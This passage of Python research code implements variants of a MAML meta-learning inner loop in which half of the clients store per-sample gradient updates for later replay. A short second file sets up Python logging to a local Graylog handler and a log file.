    """Lab-meeting-feedback variant: 50% normal clients + 50% fake clients.

    Clients with index >= split_meta_batch_size (second half) record
    per-sample fake updates in error_dict[task], stash their query split in
    error_data[task] for fake_adopt_7_now, and return placeholder zero
    tensors; the first half runs the normal MAML inner loop. `iteration` is
    unused (kept for signature compatibility).

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if task >= split_meta_batch_size:
        # Second half of the clients: fake path.
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                updates = [-learner.lr * g for g in grads]
                error_dict[task].append(updates)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        # Normal MAML path: first half of the clients.
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_7_now(learner, fake_grads, loss, error_data, task,label_index,client_index):
    """Apply the stored fake updates, then average the per-sample query losses
    selected by paired (client_index, label_index) entries."""
    # Fake adaptation first: replay every recorded update list.
    for stored_updates in fake_grads:
        update_module(learner, updates=stored_updates)
    per_sample_loss = nn.CrossEntropyLoss(reduction='none')
    # Walk the selected clients and pick one sample's query loss from each.
    picked_losses = []
    for position, client in enumerate(client_index):
        query_inputs, query_targets = error_data[client]
        sample_idx = label_index[position]
        picked_losses.append(per_sample_loss(learner(query_inputs), query_targets)[sample_idx])
    return torch.mean(torch.stack(picked_losses))
# fake7: attempt 1
# Same rough logic as the earlier failed tries: compute each loss individually and average them.
# Expected this to fail -- though if it works, it is the cleanest approach.
# Huh, it actually runs?!
############# fake adopt 8 (lab-meeting feedback)
# 50% normal + 50% fake
# first 50% of the clients: normal training
# first 50% of the clients also carry the fake computation
def fake_adopt_8_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration, split_meta_batch_size):
    """Normal MAML inner loop that ALSO records per-sample fake updates.

    Variant 8 (first half of the clients carries the fake data): every support
    sample's loss is differentiated and stored as an update list in
    error_dict[task] while the usual adaptation still runs; the query split
    goes into error_data[task] for fake_adopt_8_now. `iteration` and
    `split_meta_batch_size` are unused (kept for signature compatibility).

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt on the support loss while storing per-sample gradients.
    loss2 = nn.CrossEntropyLoss(reduction='none')
    for step in range(adaptation_steps):
        individual_loss = loss2(learner(adaptation_data), adaptation_labels)
        for il in individual_loss:
            grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
            updates = [-learner.lr * g for g in grads]
            error_dict[task].append(updates)
        train_error = loss(learner(adaptation_data), adaptation_labels)
        learner.adapt(train_error)
    error_data[task] = evaluation_data, evaluation_labels
    # train_error = torch.mean(individual_loss)
    # learner.adapt(train_error)
    predictions = learner(evaluation_data)
    valid_error = loss(predictions, evaluation_labels)
    valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_8_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
    """Apply stored fake updates, then average the per-sample query losses
    chosen by the paired (client_index, label_index) lists."""
    # Fake adaptation first.
    for update_list in fake_grads:
        update_module(learner, updates=update_list)
    per_sample = nn.CrossEntropyLoss(reduction='none')
    # One selected sample loss per listed client.
    selected = []
    for pos, client in enumerate(client_index):
        inputs, targets = error_data[client]
        selected.append(per_sample(learner(inputs), targets)[label_index[pos]])
    return torch.mean(torch.stack(selected))
## implemented on 08/12
############# fake adopt 9 (joint lab-meeting feedback)
# 50% normal + 50% fake
# first 50% of the clients: normal training
# last 50% of the clients: fake training
# + indexing (support grad / query loss)
# + class sampling without replacement
def fake_adopt_9_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration, split_meta_batch_size):
    """Variant 9 (code-identical to fake_adopt_7_before): 50% normal + 50% fake.

    Clients with index >= split_meta_batch_size (second half) record
    per-sample fake updates in error_dict[task], stash their query split in
    error_data[task] for fake_adopt_9_now, and return placeholder zero
    tensors; the first half runs the normal MAML inner loop. `iteration` is
    unused (kept for signature compatibility).

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if task >= split_meta_batch_size:
        # Second half of the clients: fake path.
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                updates = [-learner.lr * g for g in grads]
                error_dict[task].append(updates)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        # Normal MAML path: first half of the clients.
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_9_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
    """Replay the fake updates, then average per-sample query losses picked
    via the paired (client_index, label_index) selections."""
    # Fake adaptation first.
    for recorded_updates in fake_grads:
        update_module(learner, updates=recorded_updates)
    sample_wise_loss = nn.CrossEntropyLoss(reduction='none')
    chosen = []
    for idx, client in enumerate(client_index):
        client_inputs, client_targets = error_data[client]
        sample = label_index[idx]
        chosen.append(sample_wise_loss(learner(client_inputs), client_targets)[sample])
    return torch.mean(torch.stack(chosen))
# fake7: attempt 1
# Same rough logic as the earlier failed tries: compute each loss individually and average them.
# Expected this to fail -- though if it works, it is the cleanest approach.
# Huh, it actually runs?!
############# fake adopt 10 (lab-meeting feedback; banner previously copy-pasted from fake adopt 8)
# 50% normal + 50% fake
# first 50% of the clients: normal training
# first 50% of the clients also carry the fake computation
def fake_adopt_10_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration, split_meta_batch_size):
    """Variant 10 (code-identical to fake_adopt_8_before): normal MAML inner
    loop that ALSO records per-sample fake updates.

    Every support sample's loss is differentiated and stored as an update
    list in error_dict[task] while the usual adaptation still runs; the
    query split goes into error_data[task] for fake_adopt_10_now.
    `iteration` and `split_meta_batch_size` are unused here.

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt on the support loss while storing per-sample gradients.
    loss2 = nn.CrossEntropyLoss(reduction='none')
    for step in range(adaptation_steps):
        individual_loss = loss2(learner(adaptation_data), adaptation_labels)
        for il in individual_loss:
            grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
            updates = [-learner.lr * g for g in grads]
            error_dict[task].append(updates)
        train_error = loss(learner(adaptation_data), adaptation_labels)
        learner.adapt(train_error)
    error_data[task] = evaluation_data, evaluation_labels
    # train_error = torch.mean(individual_loss)
    # learner.adapt(train_error)
    predictions = learner(evaluation_data)
    valid_error = loss(predictions, evaluation_labels)
    valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_10_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
    """Apply every stored fake update, then average the query losses of the
    samples addressed by (client_index, label_index) pairs."""
    # Fake adaptation first.
    for pending in fake_grads:
        update_module(learner, updates=pending)
    elementwise_loss = nn.CrossEntropyLoss(reduction='none')
    collected = []
    for pos, client in enumerate(client_index):
        q_inputs, q_targets = error_data[client]
        collected.append(elementwise_loss(learner(q_inputs), q_targets)[label_index[pos]])
    return torch.mean(torch.stack(collected))
### For validation (compare against FP 9/10 versus the properly computed path to diagnose issues).
# Naturally there are 32 clients here and they are NOT disjoint.
# The first 16 run the normal path; the remaining 16 use the hand-rolled computation.
def fake_adopt_11_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration, split_meta_batch_size):
    """Validation variant (code-identical to fake_adopt_7_before), used to
    compare the hand-rolled fake computation against the normal path.

    Clients with index >= split_meta_batch_size take the fake path: record
    per-sample updates in error_dict[task], stash the query split in
    error_data[task] for fake_adopt_11_now, and return placeholder zero
    tensors. The remaining clients run the normal MAML inner loop.
    `iteration` is unused (kept for signature compatibility).

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if task >= split_meta_batch_size:
        # Second half of the clients: fake path.
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                updates = [-learner.lr * g for g in grads]
                error_dict[task].append(updates)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        # Normal MAML path: first half of the clients.
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_11_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
    """Replay all recorded fake updates, then return the mean of the query
    losses selected by the (client_index, label_index) pairs."""
    # Fake adaptation first.
    for saved_updates in fake_grads:
        update_module(learner, updates=saved_updates)
    unreduced_loss = nn.CrossEntropyLoss(reduction='none')
    losses = []
    for i, client in enumerate(client_index):
        data_q, labels_q = error_data[client]
        losses.append(unreduced_loss(learner(data_q), labels_q)[label_index[i]])
    return torch.mean(torch.stack(losses))
| 3.25 | 3 |
sigda/test/graylog.py | yangluoshen/sigda | 0 | 17699 | <filename>sigda/test/graylog.py
#coding:utf-8
#from graypy import GELFHandler
import logging.config
import logging
'''
handler = GELFHandler(host='0.0.0.0', port=12201)
logger = logging.getLogger()
logger.addHandler(handler)
logger.error('catch error')
'''
LOG_LEVEL = 'DEBUG'
def get_log_config(category):
    """Build a dictConfig-style logging configuration for `category`.

    Root records go to a GELF/Graylog handler and to "<category>.log";
    a console handler is defined but not attached to the root logger.
    """
    log_file = "{}.log".format(category)
    formatters = {
        'default': {'format': '%(asctime)s %(levelname)s %(message)s'},
        'console': {'format': "%(asctime)s [%(thread)d] %(levelname)s %(funcName)s\t%(message)s"},
    }
    handlers = {
        'graylog2': {
            'level': LOG_LEVEL,
            'formatter': 'default',
            'class': 'graypy.GELFHandler',
            'host': '0.0.0.0',
            'port': 12201,
            'debugging_fields': False,
            'facility': category,
        },
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'console',
        },
        'file': {
            'level': 'INFO',
            'class': 'logging.FileHandler',
            'formatter': 'console',
            'filename': log_file,
        },
    }
    return {
        'version': 1,
        'disable_existing_loggers': False,
        'formatters': formatters,
        'handlers': handlers,
        'root': {'handlers': ['graylog2', 'file'], 'level': LOG_LEVEL},
    }
# Build and install the logging configuration for the "sigda" facility,
# then emit one test error record so it shows up in Graylog and the log file.
LOG_CONFIG = get_log_config('sigda')
logging.config.dictConfig(LOG_CONFIG)
logging.error('catch error again2')
| 2.28125 | 2 |